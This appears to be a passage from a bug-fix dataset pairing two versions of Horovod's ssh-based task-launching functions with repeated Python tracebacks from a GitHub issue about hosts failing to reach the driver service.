File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39796)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39798)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Launching horovod task function was not successful:
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "/opt/conda/lib/python3.6/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 67, in <module>
_task_fn(index, driver_addresses, settings)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 27, in _task_fn
driver_addresses, settings.key, settings.verbose)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/driver/driver_service.py", line 44, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/service/driver_service.py", line 159, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 172, in __init__
'Linux.'.format(service_name=service_name, addresses=addresses))
horovod.run.common.util.network.NoValidAddressesFound: Horovod was unable to connect to horovod driver service on any of the following addresses: {'lo': [('127.0.0.1', 4548)], 'ens3': [('172.31.37.52', 4548)], 'docker0': [('172.17.0.1', 4548)]}.
One possible cause of this problem is that horovod currently requires every host to have at least one routable network interface with the same name across all of the hosts. You can run "ifconfig -a" on every host and check for the common routable interface. To fix the problem, you can rename interfaces on Linux.
|
struct.error
|
def _launch_task_servers(all_host_names, local_host_names, driver_addresses, settings):
"""
Executes the task server and service client task for registration on the
hosts.
:param all_host_names: list of addresses. for example,
['worker-0','worker-1']
['10.11.11.11', '10.11.11.12']
:type all_host_names: list(string)
:param local_host_names: names that are resolved to one of the addresses
of local hosts interfaces. For example,
set(['localhost', '127.0.0.1'])
:type local_host_names: set
:param driver_addresses: map of interfaces and their address and port for
the service. For example:
{
'lo': [('127.0.0.1', 34588)],
'docker0': [('172.122.10.1', 34588)],
'eth0': [('11.111.33.73', 34588)]
}
:type driver_addresses: map
:param settings: the object that contains the setting for running horovod
:type settings: Horovod.run.common.util.settings.Settings
:return:
:rtype:
"""
def _exec_command(command):
host_output = io.StringIO()
try:
exit_code = safe_shell_exec.execute(
command, stdout=host_output, stderr=host_output
)
if exit_code != 0:
print(
"Launching horovod task function was not "
"successful:\n{host_output}".format(
host_output=host_output.getvalue()
)
)
os._exit(exit_code)
finally:
host_output.close()
return exit_code
if settings.ssh_port:
ssh_port_arg = "-p {ssh_port}".format(ssh_port=settings.ssh_port)
else:
ssh_port_arg = ""
args_list = []
num_hosts = len(all_host_names)
for index in range(num_hosts):
host_name = all_host_names[index]
if host_name in local_host_names:
command = (
"{python} -m horovod.run.task_fn {index} {num_hosts} "
"{driver_addresses} {settings}".format(
python=sys.executable,
index=codec.dumps_base64(index),
num_hosts=codec.dumps_base64(num_hosts),
driver_addresses=codec.dumps_base64(driver_addresses),
settings=codec.dumps_base64(settings),
)
)
else:
command = (
"ssh -o PasswordAuthentication=no -o StrictHostKeyChecking=no "
"{host} {ssh_port_arg} "
"'{python} -m horovod.run.task_fn {index} {num_hosts} "
"{driver_addresses} {settings}'".format(
host=host_name,
ssh_port_arg=ssh_port_arg,
python=sys.executable,
index=codec.dumps_base64(index),
num_hosts=codec.dumps_base64(num_hosts),
driver_addresses=codec.dumps_base64(driver_addresses),
settings=codec.dumps_base64(settings),
)
)
if settings.verbose >= 2:
print("Launching horovod task function: {}".format(command))
args_list.append([command])
# Each thread will use ssh command to launch the server on one task. If an
# error occurs in one thread, entire process will be terminated. Otherwise,
# threads will keep running and ssh session -- and the the task server --
# will be bound to the thread. In case, the horovod process dies, all
# the ssh sessions and all the task servers will die as well.
threads.execute_function_multithreaded(
_exec_command, args_list, block_until_all_done=False
)
|
def _launch_task_servers(all_host_names, local_host_names, driver_addresses, settings):
"""
Executes the task server and service client task for registration on the
hosts.
:param all_host_names: list of addresses. for example,
['worker-0','worker-1']
['10.11.11.11', '10.11.11.12']
:type all_host_names: list(string)
:param local_host_names: names that are resolved to one of the addresses
of local hosts interfaces. For example,
set(['localhost', '127.0.0.1'])
:type local_host_names: set
:param driver_addresses: map of interfaces and their address and port for
the service. For example:
{
'lo': [('127.0.0.1', 34588)],
'docker0': [('172.122.10.1', 34588)],
'eth0': [('11.111.33.73', 34588)]
}
:type driver_addresses: map
:param settings: the object that contains the setting for running horovod
:type settings: Horovod.run.common.util.settings.Settings
:return:
:rtype:
"""
def _exec_command(command):
host_output = io.StringIO()
try:
exit_code = safe_shell_exec.execute(
command, stdout=host_output, stderr=host_output
)
if exit_code != 0:
print(
"Launching horovod task function was not "
"successful:\n{host_output}".format(
host_output=host_output.getvalue()
)
)
os._exit(exit_code)
finally:
host_output.close()
return exit_code
if settings.ssh_port:
ssh_port_arg = "-p {ssh_port}".format(ssh_port=settings.ssh_port)
else:
ssh_port_arg = ""
args_list = []
for index in range(len(all_host_names)):
host_name = all_host_names[index]
if host_name in local_host_names:
command = (
"{python} -m horovod.run.task_fn {index} "
"{driver_addresses} {settings}".format(
python=sys.executable,
index=codec.dumps_base64(index),
driver_addresses=codec.dumps_base64(driver_addresses),
settings=codec.dumps_base64(settings),
)
)
else:
command = (
"ssh -o StrictHostKeyChecking=no {host} {ssh_port_arg} "
"'{python} -m horovod.run.task_fn {index} {driver_addresses}"
" {settings}'".format(
host=host_name,
ssh_port_arg=ssh_port_arg,
python=sys.executable,
index=codec.dumps_base64(index),
driver_addresses=codec.dumps_base64(driver_addresses),
settings=codec.dumps_base64(settings),
)
)
args_list.append([command])
# Each thread will use ssh command to launch the server on one task. If an
# error occurs in one thread, entire process will be terminated. Otherwise,
# threads will keep running and ssh session -- and the the task server --
# will be bound to the thread. In case, the horovod process dies, all
# the ssh sessions and all the task servers will die as well.
threads.execute_function_multithreaded(
_exec_command, args_list, block_until_all_done=False
)
|
https://github.com/horovod/horovod/issues/1969
|
root@ip-172-31-37-52:/# horovodrun -np 2 -H localhost:1,172.31.35.37:1 -p 12345 --verbose ls
Filtering local host names.
Remote host found: 172.31.35.37
Checking ssh on all remote hosts.
SSH was successful into all the remote hosts.
Testing interfaces on all the hosts.
Launched horovod server.
Attempted to launch horovod task servers.
Waiting for the hosts to acknowledge.
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37436)
Exception happened during processing of request from ('172.31.37.52', 52632)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52636)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
Traceback (most recent call last):
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55358)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52642)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Exception happened during processing of request from ('127.0.0.1', 37442)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
struct.error: unpack requires a buffer of 4 bytes
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55364)
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37448)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55368)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39790)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39796)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39798)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Launching horovod task function was not successful:
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "/opt/conda/lib/python3.6/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 67, in <module>
_task_fn(index, driver_addresses, settings)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 27, in _task_fn
driver_addresses, settings.key, settings.verbose)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/driver/driver_service.py", line 44, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/service/driver_service.py", line 159, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 172, in __init__
'Linux.'.format(service_name=service_name, addresses=addresses))
horovod.run.common.util.network.NoValidAddressesFound: Horovod was unable to connect to horovod driver service on any of the following addresses: {'lo': [('127.0.0.1', 4548)], 'ens3': [('172.31.37.52', 4548)], 'docker0': [('172.17.0.1', 4548)]}.
One possible cause of this problem is that horovod currently requires every host to have at least one routable network interface with the same name across all of the hosts. You can run "ifconfig -a" on every host and check for the common routable interface. To fix the problem, you can rename interfaces on Linux.
|
struct.error
|
def _exec_command_fn(settings):
"""
executes the jobs defined by run command on hosts.
:param hosts_alloc: list of dict indicating the allocating info.
For example,
[{'Hostname':'worker-0', 'Rank': 0, 'Local_rank': 0, 'Cross_rank':0,
'Size':2, 'Local_size':1, 'Cross_size':2},
{'Hostname':'worker-1', 'Rank': 1, 'Local_rank': 0, 'Cross_rank':1,
'Size':2, 'Local_size':1, 'Cross_size':2}
]
:type hosts_alloc: list(dict)
:param remote_host_names: names that are resolved to one of the addresses
of remote hosts interfaces.
:type remote_host_names: set
:param _run_command: command to execute
:type _run_command: string
:return:
:rtype:
"""
ssh_port_arg = (
"-p {ssh_port}".format(ssh_port=settings.ssh_port) if settings.ssh_port else ""
)
def _exec_command(command, slot_info, events):
index = slot_info.rank
host_name = slot_info.hostname
host_address = network.resolve_host_address(host_name)
local_addresses = network.get_local_host_addresses()
if host_address not in local_addresses:
command = (
"ssh -o PasswordAuthentication=no -o StrictHostKeyChecking=no "
"{host} {ssh_port_arg} "
"{local_command}".format(
host=host_name,
ssh_port_arg=ssh_port_arg,
local_command=quote(
"cd {pwd} > /dev/null 2>&1 ; {local_command}".format(
pwd=os.getcwd(), local_command=command
)
),
)
)
if settings.verbose:
print(command)
# Redirect output if requested
stdout = stderr = None
stdout_file = stderr_file = None
if settings.output_filename:
padded_rank = _pad_rank(index, settings.num_proc)
output_dir_rank = os.path.join(
settings.output_filename, "rank.{rank}".format(rank=padded_rank)
)
if not os.path.exists(output_dir_rank):
os.mkdir(output_dir_rank)
stdout_file = open(os.path.join(output_dir_rank, "stdout"), "w")
stderr_file = open(os.path.join(output_dir_rank, "stderr"), "w")
stdout = MultiFile([sys.stdout, stdout_file])
stderr = MultiFile([sys.stderr, stderr_file])
try:
exit_code = safe_shell_exec.execute(
command, index=index, stdout=stdout, stderr=stderr, events=events
)
if exit_code != 0:
print(
"Process {idx} exit with status code {ec}.".format(
idx=index, ec=exit_code
)
)
except Exception as e:
print(
"Exception happened during safe_shell_exec, exception "
"message: {message}".format(message=e)
)
exit_code = 1
finally:
if stdout_file:
stdout_file.close()
if stderr_file:
stderr_file.close()
return exit_code, time.time()
return _exec_command
|
def _exec_command_fn(settings):
"""
executes the jobs defined by run command on hosts.
:param hosts_alloc: list of dict indicating the allocating info.
For example,
[{'Hostname':'worker-0', 'Rank': 0, 'Local_rank': 0, 'Cross_rank':0,
'Size':2, 'Local_size':1, 'Cross_size':2},
{'Hostname':'worker-1', 'Rank': 1, 'Local_rank': 0, 'Cross_rank':1,
'Size':2, 'Local_size':1, 'Cross_size':2}
]
:type hosts_alloc: list(dict)
:param remote_host_names: names that are resolved to one of the addresses
of remote hosts interfaces.
:type remote_host_names: set
:param _run_command: command to execute
:type _run_command: string
:return:
:rtype:
"""
ssh_port_arg = (
"-p {ssh_port}".format(ssh_port=settings.ssh_port) if settings.ssh_port else ""
)
def _exec_command(command, slot_info, events):
index = slot_info.rank
host_name = slot_info.hostname
host_address = network.resolve_host_address(host_name)
local_addresses = network.get_local_host_addresses()
if host_address not in local_addresses:
command = (
"ssh -o StrictHostKeyChecking=no {host} {ssh_port_arg} "
"{local_command}".format(
host=host_name,
ssh_port_arg=ssh_port_arg,
local_command=quote(
"cd {pwd} > /dev/null 2>&1 ; {local_command}".format(
pwd=os.getcwd(), local_command=command
)
),
)
)
if settings.verbose:
print(command)
# Redirect output if requested
stdout = stderr = None
stdout_file = stderr_file = None
if settings.output_filename:
padded_rank = _pad_rank(index, settings.num_proc)
output_dir_rank = os.path.join(
settings.output_filename, "rank.{rank}".format(rank=padded_rank)
)
if not os.path.exists(output_dir_rank):
os.mkdir(output_dir_rank)
stdout_file = open(os.path.join(output_dir_rank, "stdout"), "w")
stderr_file = open(os.path.join(output_dir_rank, "stderr"), "w")
stdout = MultiFile([sys.stdout, stdout_file])
stderr = MultiFile([sys.stderr, stderr_file])
try:
exit_code = safe_shell_exec.execute(
command, index=index, stdout=stdout, stderr=stderr, events=events
)
if exit_code != 0:
print(
"Process {idx} exit with status code {ec}.".format(
idx=index, ec=exit_code
)
)
except Exception as e:
print(
"Exception happened during safe_shell_exec, exception "
"message: {message}".format(message=e)
)
exit_code = 1
finally:
if stdout_file:
stdout_file.close()
if stderr_file:
stderr_file.close()
return exit_code, time.time()
return _exec_command
|
https://github.com/horovod/horovod/issues/1969
|
root@ip-172-31-37-52:/# horovodrun -np 2 -H localhost:1,172.31.35.37:1 -p 12345 --verbose ls
Filtering local host names.
Remote host found: 172.31.35.37
Checking ssh on all remote hosts.
SSH was successful into all the remote hosts.
Testing interfaces on all the hosts.
Launched horovod server.
Attempted to launch horovod task servers.
Waiting for the hosts to acknowledge.
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37436)
Exception happened during processing of request from ('172.31.37.52', 52632)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52636)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
Traceback (most recent call last):
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55358)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52642)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Exception happened during processing of request from ('127.0.0.1', 37442)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
struct.error: unpack requires a buffer of 4 bytes
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55364)
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37448)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55368)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39790)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39796)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
